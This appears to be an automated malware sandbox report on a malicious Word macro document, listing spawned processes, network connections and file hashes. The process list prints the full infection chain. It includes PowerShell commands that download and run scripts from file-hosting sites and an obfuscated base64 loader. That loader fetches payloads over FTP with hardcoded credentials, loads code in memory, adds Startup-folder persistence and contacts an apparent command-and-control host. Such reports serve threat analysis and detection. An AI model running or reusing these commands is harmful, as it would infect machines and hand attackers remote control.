| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc.docm" /o ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/rgZiV9iE/8r-wKti0.d13d81b1839707719820361a64160ba8 -o test.js; explorer.exe test.js
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" test.js
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $vCHvw = 'J⅕BS⅕H⅕⅕RwBK⅕GI⅕I⅕⅕9⅕C⅕⅕J⅕Bo⅕G8⅕cwB0⅕C4⅕VgBl⅕HI⅕cwBp⅕G8⅕bg⅕u⅕E0⅕YQBq⅕G8⅕cg⅕u⅕EU⅕cQB1⅕GE⅕b⅕Bz⅕Cg⅕Mg⅕p⅕Ds⅕SQBm⅕C⅕⅕K⅕⅕k⅕FI⅕c⅕BH⅕Eo⅕Yg⅕p⅕C⅕⅕ew⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕SQBP⅕C4⅕U⅕Bh⅕HQ⅕a⅕Bd⅕Do⅕OgBH⅕GU⅕d⅕BU⅕GU⅕bQBw⅕F⅕⅕YQB0⅕Gg⅕K⅕⅕p⅕Ds⅕Z⅕Bl⅕Gw⅕I⅕⅕o⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕Ow⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕n⅕Gg⅕d⅕B0⅕H⅕⅕cw⅕6⅕C8⅕LwBk⅕HI⅕aQB2⅕GU⅕LgBn⅕G8⅕bwBn⅕Gw⅕ZQ⅕u⅕GM⅕bwBt⅕C8⅕dQBj⅕D8⅕ZQB4⅕H⅕⅕bwBy⅕HQ⅕PQBk⅕G8⅕dwBu⅕Gw⅕bwBh⅕GQ⅕JgBp⅕GQ⅕PQ⅕n⅕Ds⅕J⅕BI⅕FQ⅕WQBm⅕HY⅕I⅕⅕9⅕C⅕⅕J⅕Bl⅕G4⅕dg⅕6⅕F⅕⅕UgBP⅕EM⅕RQBT⅕FM⅕TwBS⅕F8⅕QQBS⅕EM⅕S⅕BJ⅕FQ⅕RQBD⅕FQ⅕VQBS⅕EU⅕LgBD⅕G8⅕bgB0⅕GE⅕aQBu⅕HM⅕K⅕⅕n⅕DY⅕N⅕⅕n⅕Ck⅕OwBp⅕GY⅕I⅕⅕o⅕CQ⅕S⅕BU⅕Fk⅕ZgB2⅕Ck⅕I⅕B7⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕PQ⅕g⅕Cg⅕J⅕Bo⅕FM⅕QQBI⅕H⅕⅕I⅕⅕r⅕C⅕⅕JwBX⅕DE⅕MQ⅕y⅕EE⅕Z⅕BQ⅕GY⅕SQ⅕w⅕F⅕⅕Qw⅕3⅕Gg⅕YgBz⅕GM⅕aQBf⅕DU⅕Xw⅕w⅕F8⅕ZQBV⅕Dc⅕TgB3⅕E0⅕WgBo⅕GY⅕N⅕B4⅕Cc⅕KQ⅕g⅕Ds⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ew⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕o⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕Kw⅕g⅕Cc⅕MQBi⅕HI⅕ag⅕1⅕Go⅕cQBu⅕HE⅕UgB4⅕EM⅕R⅕⅕2⅕FY⅕a⅕Bm⅕Gg⅕QQBu⅕DI⅕cgBj⅕FY⅕ZgBz⅕FI⅕bw⅕3⅕EQ⅕O⅕Bn⅕HI⅕Jw⅕p⅕C⅕⅕OwB9⅕Ds⅕J⅕Bm⅕Hc⅕UwBZ⅕H⅕⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BG⅕Gk⅕b⅕Bl⅕Cg⅕J⅕BV⅕FI⅕T⅕BL⅕EI⅕L⅕⅕g⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕I⅕⅕7⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕PQ⅕g⅕Cg⅕JwBD⅕Do⅕X⅕BV⅕HM⅕ZQBy⅕HM⅕X⅕⅕n⅕C⅕⅕Kw⅕g⅕Fs⅕RQBu⅕HY⅕aQBy⅕G8⅕bgBt⅕GU⅕bgB0⅕F0⅕Og⅕6⅕FU⅕cwBl⅕HI⅕TgBh⅕G0⅕ZQ⅕g⅕Ck⅕Ow⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕9⅕C⅕⅕K⅕⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕Cs⅕I⅕⅕n⅕Fw⅕VQBw⅕Hc⅕aQBu⅕C4⅕bQBz⅕HU⅕Jw⅕p⅕Ds⅕I⅕Bw⅕G8⅕dwBl⅕HI⅕cwBo⅕GU⅕b⅕Bs⅕C4⅕ZQB4⅕GU⅕I⅕B3⅕HU⅕cwBh⅕C4⅕ZQB4⅕GU⅕I⅕⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕v⅕HE⅕dQBp⅕GU⅕d⅕⅕g⅕C8⅕bgBv⅕HI⅕ZQBz⅕HQ⅕YQBy⅕HQ⅕I⅕⅕7⅕C⅕⅕QwBv⅕H⅕⅕eQ⅕t⅕Ek⅕d⅕Bl⅕G0⅕I⅕⅕n⅕CU⅕R⅕BD⅕F⅕⅕SgBV⅕CU⅕Jw⅕g⅕C0⅕R⅕Bl⅕HM⅕d⅕Bp⅕G4⅕YQB0⅕Gk⅕bwBu⅕C⅕⅕K⅕⅕g⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BB⅕H⅕⅕c⅕BE⅕GE⅕d⅕Bh⅕Fw⅕UgBv⅕GE⅕bQBp⅕G4⅕ZwBc⅕E0⅕aQBj⅕HI⅕bwBz⅕G8⅕ZgB0⅕Fw⅕VwBp⅕G4⅕Z⅕Bv⅕Hc⅕cwBc⅕FM⅕d⅕Bh⅕HI⅕d⅕⅕g⅕E0⅕ZQBu⅕HU⅕X⅕BQ⅕HI⅕bwBn⅕HI⅕YQBt⅕HM⅕X⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕Cc⅕I⅕⅕p⅕C⅕⅕LQBm⅕G8⅕cgBj⅕GU⅕I⅕⅕7⅕H⅕⅕bwB3⅕GU⅕cgBz⅕Gg⅕ZQBs⅕Gw⅕LgBl⅕Hg⅕ZQ⅕g⅕C0⅕YwBv⅕G0⅕bQBh⅕G4⅕Z⅕⅕g⅕Cc⅕cwBs⅕GU⅕ZQBw⅕C⅕⅕MQ⅕4⅕D⅕⅕Jw⅕7⅕C⅕⅕cwBo⅕HU⅕d⅕Bk⅕G8⅕dwBu⅕C4⅕ZQB4⅕GU⅕I⅕⅕v⅕HI⅕I⅕⅕v⅕HQ⅕I⅕⅕w⅕C⅕⅕LwBm⅕C⅕⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ewBb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBT⅕GU⅕cgB2⅕Gk⅕YwBl⅕F⅕⅕bwBp⅕G4⅕d⅕BN⅕GE⅕bgBh⅕Gc⅕ZQBy⅕F0⅕Og⅕6⅕FM⅕ZQBy⅕HY⅕ZQBy⅕EM⅕ZQBy⅕HQ⅕aQBm⅕Gk⅕YwBh⅕HQ⅕ZQBW⅕GE⅕b⅕Bp⅕GQ⅕YQB0⅕Gk⅕bwBu⅕EM⅕YQBs⅕Gw⅕YgBh⅕GM⅕aw⅕g⅕D0⅕I⅕B7⅕CQ⅕d⅕By⅕HU⅕ZQB9⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕E4⅕ZQB0⅕C4⅕UwBl⅕HI⅕dgBp⅕GM⅕ZQBQ⅕G8⅕aQBu⅕HQ⅕TQBh⅕G4⅕YQBn⅕GU⅕cgBd⅕Do⅕OgBT⅕GU⅕YwB1⅕HI⅕aQB0⅕Hk⅕U⅕By⅕G8⅕d⅕Bv⅕GM⅕bwBs⅕C⅕⅕PQ⅕g⅕Fs⅕UwB5⅕HM⅕d⅕Bl⅕G0⅕LgBO⅕GU⅕d⅕⅕u⅕FM⅕ZQBj⅕HU⅕cgBp⅕HQ⅕eQBQ⅕HI⅕bwB0⅕G8⅕YwBv⅕Gw⅕V⅕B5⅕H⅕⅕ZQBd⅕Do⅕OgBU⅕Gw⅕cw⅕x⅕DI⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕g⅕D0⅕I⅕⅕o⅕E4⅕ZQB3⅕C0⅕TwBi⅕Go⅕ZQBj⅕HQ⅕I⅕BO⅕GU⅕d⅕⅕u⅕Fc⅕ZQBi⅕EM⅕b⅕Bp⅕GU⅕bgB0⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBD⅕HI⅕ZQBk⅕GU⅕bgB0⅕Gk⅕YQBs⅕HM⅕I⅕⅕9⅕C⅕⅕bgBl⅕Hc⅕LQBv⅕GI⅕agBl⅕GM⅕d⅕⅕g⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBO⅕GU⅕d⅕B3⅕G8⅕cgBr⅕EM⅕cgBl⅕GQ⅕ZQBu⅕HQ⅕aQBh⅕Gw⅕K⅕⅕n⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕MQ⅕n⅕Cw⅕JwBk⅕GU⅕dgBl⅕Gw⅕bwBw⅕GU⅕cgBw⅕HI⅕bw⅕y⅕DE⅕NQ⅕3⅕Dg⅕SgBw⅕E⅕⅕Q⅕⅕n⅕Ck⅕Ow⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕D0⅕I⅕⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BT⅕HQ⅕cgBp⅕G4⅕Zw⅕o⅕C⅕⅕JwBm⅕HQ⅕c⅕⅕6⅕C8⅕LwBk⅕GU⅕cwBj⅕Gs⅕dgBi⅕HI⅕YQB0⅕DE⅕Q⅕Bm⅕HQ⅕c⅕⅕u⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕LgBj⅕G8⅕bQ⅕u⅕GI⅕cg⅕v⅕FU⅕c⅕Bj⅕HI⅕eQBw⅕HQ⅕ZQBy⅕C8⅕M⅕⅕y⅕C8⅕R⅕BM⅕Ew⅕M⅕⅕x⅕C4⅕d⅕B4⅕HQ⅕Jw⅕g⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕GQ⅕aQBz⅕H⅕⅕bwBz⅕GU⅕K⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕I⅕⅕9⅕C⅕⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕FQ⅕ZQB4⅕HQ⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕XQ⅕6⅕Do⅕VQBU⅕EY⅕O⅕⅕7⅕CQ⅕TQBX⅕GY⅕dQBh⅕C⅕⅕PQ⅕g⅕CQ⅕dwBW⅕F⅕⅕b⅕B1⅕C4⅕R⅕Bv⅕Hc⅕bgBs⅕G8⅕YQBk⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕Ck⅕OwBb⅕EI⅕eQB0⅕GU⅕WwBd⅕F0⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕QwBv⅕G4⅕dgBl⅕HI⅕d⅕Bd⅕Do⅕OgBG⅕HI⅕bwBt⅕EI⅕YQBz⅕GU⅕Ng⅕0⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕u⅕FI⅕ZQBw⅕Gw⅕YQBj⅕GU⅕K⅕⅕g⅕Cc⅕kyE6⅕JMhJw⅕g⅕Cw⅕I⅕⅕n⅕EE⅕Jw⅕g⅕Ck⅕I⅕⅕p⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕EE⅕c⅕Bw⅕EQ⅕bwBt⅕GE⅕aQBu⅕F0⅕Og⅕6⅕EM⅕dQBy⅕HI⅕ZQBu⅕HQ⅕R⅕Bv⅕G0⅕YQBp⅕G4⅕LgBM⅕G8⅕YQBk⅕Cg⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕Ck⅕LgBH⅕GU⅕d⅕BU⅕Hk⅕c⅕Bl⅕Cg⅕I⅕⅕n⅕EM⅕b⅕Bh⅕HM⅕cwBM⅕Gk⅕YgBy⅕GE⅕cgB5⅕DM⅕LgBD⅕Gw⅕YQBz⅕HM⅕MQ⅕n⅕C⅕⅕KQ⅕u⅕Ec⅕ZQB0⅕E0⅕ZQB0⅕Gg⅕bwBk⅕Cg⅕I⅕⅕n⅕H⅕⅕cgBG⅕FY⅕SQ⅕n⅕C⅕⅕KQ⅕u⅕Ek⅕bgB2⅕G8⅕awBl⅕Cg⅕J⅕Bu⅕HU⅕b⅕Bs⅕Cw⅕I⅕Bb⅕G8⅕YgBq⅕GU⅕YwB0⅕Fs⅕XQBd⅕C⅕⅕K⅕⅕g⅕Cc⅕Mg⅕y⅕CU⅕OQ⅕3⅕D⅕⅕MwBj⅕GY⅕N⅕⅕0⅕GI⅕Z⅕⅕z⅕DU⅕YQ⅕1⅕GM⅕N⅕⅕3⅕DQ⅕Ng⅕y⅕GI⅕NwBi⅕GU⅕O⅕⅕y⅕Dk⅕O⅕⅕x⅕DI⅕Zg⅕2⅕DI⅕Mg⅕l⅕D0⅕dg⅕m⅕GQ⅕YQBv⅕Gw⅕bgB3⅕G8⅕Z⅕⅕9⅕GU⅕YwBy⅕HU⅕bwBz⅕CY⅕d⅕B4⅕HQ⅕Lg⅕0⅕DI⅕M⅕⅕y⅕C4⅕Nw⅕w⅕C4⅕M⅕⅕z⅕Dc⅕Mg⅕l⅕Dc⅕Mg⅕l⅕Dg⅕LQBG⅕FQ⅕VQBE⅕DM⅕JQBB⅕DI⅕JQBl⅕G0⅕YQBu⅕GU⅕b⅕Bp⅕GY⅕KwBC⅕DM⅕JQ⅕y⅕DI⅕JQB0⅕Hg⅕d⅕⅕u⅕DQ⅕Mg⅕w⅕DI⅕Lg⅕3⅕D⅕⅕Lg⅕w⅕DM⅕Mg⅕y⅕CU⅕R⅕⅕z⅕CU⅕ZQBt⅕GE⅕bgBl⅕Gw⅕aQBm⅕Cs⅕Qg⅕z⅕CU⅕d⅕Bu⅕GU⅕bQBo⅕GM⅕YQB0⅕HQ⅕YQ⅕9⅕G4⅕bwBp⅕HQ⅕aQBz⅕G8⅕c⅕Bz⅕Gk⅕Z⅕⅕t⅕HQ⅕bgBl⅕HQ⅕bgBv⅕GM⅕LQBl⅕HM⅕bgBv⅕H⅕⅕cwBl⅕HI⅕PwB0⅕Hg⅕d⅕⅕u⅕GU⅕N⅕⅕1⅕DM⅕N⅕⅕y⅕DQ⅕Mg⅕3⅕Dk⅕O⅕⅕1⅕C0⅕NQBl⅕Dc⅕OQ⅕t⅕GY⅕Yw⅕2⅕DQ⅕LQ⅕0⅕DU⅕N⅕⅕4⅕C0⅕M⅕⅕5⅕Dc⅕ZgBh⅕D⅕⅕NQ⅕1⅕C8⅕bwBR⅕E8⅕MgBM⅕HU⅕M⅕Bv⅕C8⅕cwBt⅕GU⅕d⅕Bp⅕C8⅕bQBv⅕GM⅕LgB0⅕Gg⅕ZwBp⅕Ho⅕LgBu⅕GQ⅕Yw⅕u⅕D⅕⅕bg⅕u⅕DE⅕cgB0⅕C4⅕NwBw⅕C8⅕Lw⅕6⅕HM⅕c⅕B0⅕HQ⅕a⅕⅕n⅕C⅕⅕L⅕⅕g⅕Cc⅕JQBE⅕EM⅕U⅕BK⅕FU⅕JQ⅕n⅕Cw⅕I⅕⅕n⅕FQ⅕cgB1⅕GU⅕MQ⅕n⅕C⅕⅕KQ⅕g⅕Ck⅕OwB9⅕Ds⅕';$vCHvw = $vCHvw.replace('⅕','A') ;$vCHvw = [System.Convert]::FromBase64String( $vCHvw ) ;;;$vCHvw = [System.Text.Encoding]::Unicode.GetString( $vCHvw ) ;$vCHvw = $vCHvw.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $vCHvw
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$RpGJb = $host.Version.Major.Equals(2);If ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($HTYfv) {$hSAHp = ($hSAHp + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient) ;$fwSYp.Encoding = [System.Text.Encoding]::UTF8 ;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$wVPlu.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$MWfua = $wVPlu.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$wVPlu.dispose();$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$MWfua = $wVPlu.DownloadString( $MWfua );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $MWfua.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%9703cf44bd35a5c47462b7be829812f622%=v&daolnwod=ecruos&txt.4202.70.0372%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.70.0322%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.e45342427985-5e79-fc64-4548-097fa055/oQO2Lu0o/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'True1' ) );};"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft SyS\\x2.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft SyS\skowf.ps1"
C:\Windows\system32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.4sync.com | udp |
| US | 204.155.149.140:443 | www.4sync.com | tcp |
| US | 8.8.8.8:53 | dc539.4sync.com | udp |
| US | 204.155.145.53:443 | dc539.4sync.com | tcp |
| US | 8.8.8.8:53 | 140.149.155.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.145.155.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.desckvbrat.com.br | udp |
| BR | 191.252.83.213:21 | ftp.desckvbrat.com.br | tcp |
| BR | 191.252.83.213:60365 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | 213.83.252.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 200.187.67.172.in-addr.arpa | udp |
| BR | 191.252.83.213:60780 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | p7.tr1.n0.cdn.zight.com | udp |
| GB | 216.137.44.111:443 | p7.tr1.n0.cdn.zight.com | tcp |
| BR | 191.252.83.213:60182 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | 111.44.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marcelotatuape.ddns.net | udp |
| BR | 177.52.84.20:333 | marcelotatuape.ddns.net | tcp |
| BR | 177.52.84.20:333 | marcelotatuape.ddns.net | tcp |
Files
memory/4092-2-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-3-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-4-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-1-0x00007FF92C4AD000-0x00007FF92C4AE000-memory.dmp
memory/4092-0-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-9-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-8-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-12-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-11-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-13-0x00007FF8EA140000-0x00007FF8EA150000-memory.dmp
memory/4092-14-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-10-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-15-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-16-0x00007FF8EA140000-0x00007FF8EA150000-memory.dmp
memory/4092-17-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-21-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-20-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-19-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-18-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-7-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-6-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-5-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-35-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-36-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 773310ee7af28b5f8cb6ed1228367996 |
| SHA1 | dcb0b7ca045da9a48f73cfd25f816969b34f6020 |
| SHA256 | cb2b9b92909403d7aa1c192f221a94d187f8f3d6216ab3bbc77172ca3bcbab8a |
| SHA512 | cbdbdd7e6e2515339ee791f2bf3d2e299eaee637d19f7824e2a849818309c160c7434485fad9e52affac6a499a6ad83bdafabf44655550738f431ea2cee80a5c |
memory/4092-44-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-45-0x00007FF92C4AD000-0x00007FF92C4AE000-memory.dmp
memory/4092-46-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-47-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-48-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/4092-61-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
memory/2676-62-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rkvnjqje.xyp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2676-69-0x000001D510480000-0x000001D5104A2000-memory.dmp
memory/2676-82-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\test.js
| MD5 | 4e37cf7563ad5ebcde8bfcb51a515c48 |
| SHA1 | b9f758dd64b60da7da2f01b680d45abaf854f41e |
| SHA256 | f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331 |
